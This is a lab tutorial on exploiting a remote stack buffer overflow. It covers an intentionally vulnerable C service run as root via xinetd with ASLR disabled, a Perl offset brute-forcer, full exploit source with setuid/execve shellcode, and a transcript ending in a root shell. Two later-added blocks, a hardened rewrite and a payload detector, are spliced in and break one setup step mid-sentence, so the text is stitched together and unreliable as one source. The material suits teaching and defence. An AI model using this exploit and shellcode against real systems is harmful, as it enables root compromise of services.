Remote Buffer Overflow Attack (Environment Setup and Attack Method)

Author: admin   Category: Misc   Published: 2019-05-29 21:58

1. Setting up the vulnerable environment

Lab environment

Operating system: CentOS 5.5

Installed packages: gdb, gcc, xinetd

Prerequisites

Disable the operating system's stack execution protection (Exec Shield) and address space randomization (ASLR), otherwise the stack address found below is neither stable nor executable:

sysctl -w kernel.randomize_va_space=0 && sysctl -w kernel.exec-shield=0

Target vulnerable code (doit() copies input of up to 4096 bytes into a 400-byte stack buffer with an unbounded strcpy, and main() reads it with gets()):

#include<stdio.h>
#include<string.h>
#include<ctype.h>
int doit(char *str)
{
  char bufz[400];
  printf("doing stuffz...\n");
  strcpy(bufz,str);
  return(0);
}
int main(int argc,char *argv[])
{
  char buf[4096];
  gets(buf);
  doit(buf);
  //doit(argv[1]);
  printf("DONE STUFFZ..[%s]\n",buf);
  return(0);
}

Save the code as a C source file (vuln.c) in the /root directory.

Then compile it: gcc -o vuln vuln.c. Do not delete the source file after compiling.

Edit /etc/services and append the following entry:
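As an added example that is not part of the original post, the following is a hardened counterpart of vuln.c: it keeps the same 400-byte buffer and the same DONE STUFFZ output, but replaces the unbounded strcpy with a length check plus memcpy and replaces gets() with fgets(), so oversized input is rejected instead of overwriting the saved return address. The names safe_doit, read_line and check_input_length are this example's own; it compiles with the same gcc invocation as the vulnerable version.

```c
/* Hardened counterpart of vuln.c (added example, not the original post's code).
 * Names safe_doit / read_line / check_input_length are this example's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFZ_SIZE 400

/* Returns 0 on success, -1 if the input would not fit in the fixed buffer.
 * The explicit length check replaces the unbounded strcpy of the original. */
int safe_doit(const char *str)
{
    char bufz[BUFZ_SIZE];
    size_t len = strlen(str);
    if (len >= sizeof bufz) {
        return -1;               /* reject instead of writing past the end of bufz */
    }
    memcpy(bufz, str, len + 1);  /* len + 1 includes the terminator and is known to fit */
    printf("doing stuffz... (%zu bytes)\n", len);
    return 0;
}

/* fgets-based replacement for gets(): never stores more than size - 1 bytes
 * plus the terminator. Strips a trailing newline. Returns the number of bytes
 * read, or -1 on EOF / read error. */
long read_line(char *buf, size_t size, FILE *in)
{
    if (fgets(buf, (int)size, in) == NULL) {
        return -1;
    }
    size_t n = strcspn(buf, "\n");
    buf[n] = '\0';
    return (long)n;
}

/* Test helper: feed safe_doit a string of n 'A' bytes and return its verdict
 * (0 accepted, -1 rejected, -2 allocation failure). */
int check_input_length(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL) {
        return -2;
    }
    memset(s, 'A', n);
    s[n] = '\0';
    int rc = safe_doit(s);
    free(s);
    return rc;
}

int main(void)
{
    char buf[4096];
    if (read_line(buf, sizeof buf, stdin) < 0) {
        return 1;
    }
    if (safe_doit(buf) != 0) {
        fprintf(stderr, "input too long (max %d bytes)\n", BUFZ_SIZE - 1);
        return 1;
    }
    printf("DONE STUFFZ..[%s]\n", buf);
    return 0;
}
```

With this version in place of /root/vuln, the 1224-byte buffers sent by the brute-force loop later in the post are refused with a non-zero exit status; the 4096-byte main() buffer is still bounded by fgets(), so neither copy can run past its destination.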

vuln      555/tcp
#added to test remote exploit

Then create the following file in /etc/xinetd.d/. It has no extension; save it simply as vuln:

#default:on
#description:The vuln server is to test remote exploits,do NOT leave
#in place!!! It is vulnerable.!!
service vuln
{
  flags     =   REUSE
  socket_type   =   stream
  wait          =   no
  user          =   root
  server        =   /root/vuln
  #log_on_failure+  =   USERID
}

Then restart the xinetd daemon:

/etc/init.d/xinetd restart

Finally, verify that port 555 is listening.

2. Attack process

First, determine the ESP value of the remote target by running the same binary under gdb (with ASLR disabled, the stack address is stable across runs):

[root@localhost ~]# gdb vuln
GNU gdb (GDB) Red Hat Enterprise Linux (7.0.1-23.el5)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /root/vuln...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x8048453
(gdb) run
Starting program: /root/vuln

Breakpoint 1, 0x08048453 in main ()
(gdb) info reg esp
esp            0xbfffea54       0xbfffea54
(gdb)

The ESP value obtained here is 0xbfffea54.

Now write a script that brute-forces the offset from ESP to the overwritten return address:

#!/usr/bin/perl
$MIN = 0;
$MAX = 5000;
while ($MIN < $MAX) {
    printf("offset:$MIN Hold down the enter key til program stops...\n");
    system("(./exploit 1224 $MIN 0xbfffea54;cat) | nc 172.16.1.103 555");
    $MIN++;
}

Save it as brute.pl.

The exploit source code is as follows:

#include <stdio.h>
#include <stdlib.h>   /* atoi, strtoul, malloc, free */
#include <string.h>   /* strlen */

char shellcode[] = // setuid(0)
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* returns the current stack pointer (32-bit x86 only) */
unsigned long get_sp(void) {
  __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  int i, offset = 0;
  long esp, ret, *addr_ptr;
  char *buffer, *ptr;
  int size = 500;
  esp = get_sp();
  if (argc > 1) size = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) esp = strtoul(argv[3], NULL, 0);
  ret = esp - offset;
  fprintf(stderr, "Usage:%s<buff_size><offset><esp:0xfff...>\n", argv[0]);
  fprintf(stderr, "ESP:0x%lx Offset:0x%x Return:0x%lx\n", esp, offset, ret);
  buffer = (char *)malloc(size);
  ptr = buffer;
  addr_ptr = (long *)ptr;
  for (i = 0; i < size; i += 4) {     /* fill the whole buffer with the return address */
    *(addr_ptr++) = ret;
  }
  for (i = 0; i < size / 2; i++) {    /* first half: NOP sled */
    buffer[i] = '\x90';
  }
  ptr = buffer + size / 2;            /* second half: shellcode */
  for (i = 0; i < strlen(shellcode); i++) {
    *(ptr++) = shellcode[i];
  }
  buffer[size - 1] = 0;
  printf("%s", buffer);
  free(buffer);
  return 0;
}

Save it as exploit.c and compile it: gcc -o exploit exploit.c

Tip: it is best to compile it inside CentOS 5.5 (a 32-bit system, which the inline assembly in get_sp() assumes) to avoid unpredictable errors later on.

Procedure
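From the defender's side, every one of the 2000-plus connections sent by brute.pl carries a buffer with the same shape as the one exploit.c builds: a long run of 0x90 bytes followed by one 4-byte address repeated to the end. The following is an added detection example (not part of the original post) that scores a captured message on exactly those two features. The function names, the thresholds (32 NOPs, 16 repeats) and the sample payload are this example's own constructions; the sample reuses the address 0xbfffe174 from the successful run shown below.

```c
/* Added detection example, not the original post's code. Byte-level heuristic
 * for messages shaped like the exploit's buffer (NOP sled + repeated address).
 * Names, thresholds and the sample buffer are this example's own assumptions. */
#include <stddef.h>
#include <string.h>

/* Longest run of consecutive 0x90 (x86 NOP) bytes in data[0..n). */
size_t longest_nop_run(const unsigned char *data, size_t n)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < n; i++) {
        cur = (data[i] == 0x90) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best;
}

/* How often the most frequent 4-byte-aligned word occurs. A buffer stuffed
 * with one return address scores close to n / 4. O(n^2) is acceptable for a
 * single message-sized input. */
size_t max_repeated_word(const unsigned char *data, size_t n)
{
    size_t best = 0;
    for (size_t i = 0; i + 4 <= n; i += 4) {
        size_t count = 0;
        for (size_t j = 0; j + 4 <= n; j += 4) {
            if (memcmp(data + i, data + j, 4) == 0) count++;
        }
        if (count > best) best = count;
    }
    return best;
}

/* Verdict: 1 if the message looks like a stack-smashing payload, else 0.
 * Thresholds are illustrative assumptions, not tuned values. */
int looks_like_overflow_payload(const unsigned char *data, size_t n)
{
    return (longest_nop_run(data, n) >= 32 || max_repeated_word(data, n) >= 16) ? 1 : 0;
}

/* Constructed sample in the exploit's layout: first half 0x90, the rest one
 * little-endian word (0xbfffe174, the address from the post) repeated. */
size_t build_sample_payload(unsigned char *out, size_t size)
{
    static const unsigned char word[4] = {0x74, 0xe1, 0xff, 0xbf};
    size_t half = size / 2;
    memset(out, 0x90, half);
    for (size_t i = half; i + 4 <= size; i += 4) {
        memcpy(out + i, word, 4);
    }
    return size;
}

/* Helpers so the verdicts can be checked without a main(). */
int sample_payload_flagged(void)
{
    unsigned char buf[256];
    size_t n = build_sample_payload(buf, sizeof buf);
    return looks_like_overflow_payload(buf, n);
}

int benign_text_flagged(void)
{
    /* Constructed ordinary line-oriented input for comparison. */
    const char *msg = "GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n";
    return looks_like_overflow_payload((const unsigned char *)msg, strlen(msg));
}
```

Run over the bytes of each connection to port 555, the sample payload is flagged on both features (a 128-byte NOP run and a word repeated 32 times), while an ordinary text request is not. In practice the stronger signal on this lab is the volume: thousands of connections from one host, each closed after a single oversized line, which is what the xinetd log and a connection counter will show long before any byte pattern is inspected.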

root@kali:~# perl brute.pl
offset:0 Hold down the enter key til program stops...
Usage:./exploit<buff_size><offset><esp:0xfff...>
ESP:0xbfffea54 Offset:0x6f7 Return:0xbfffe35d
.
.
.
(over 2000 iterations omitted)
.
.
.
offset:2272 Hold down the enter key til program stops...
Usage:./exploit<buff_size><offset><esp:0xfff...>
ESP:0xbfffea54 Offset:0x8e0 Return:0xbfffe174

id      ### typed manually here
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

cat /root/flag.txt
123456789 555

Shell obtained successfully. It runs as root because the xinetd entry above starts /root/vuln with user = root.

Afterwards the attack can be launched directly with (./exploit 1224 2272 0xbfffea54;cat) | nc 172.16.1.103 555

Any shortcomings in this article can be discussed in the comments.
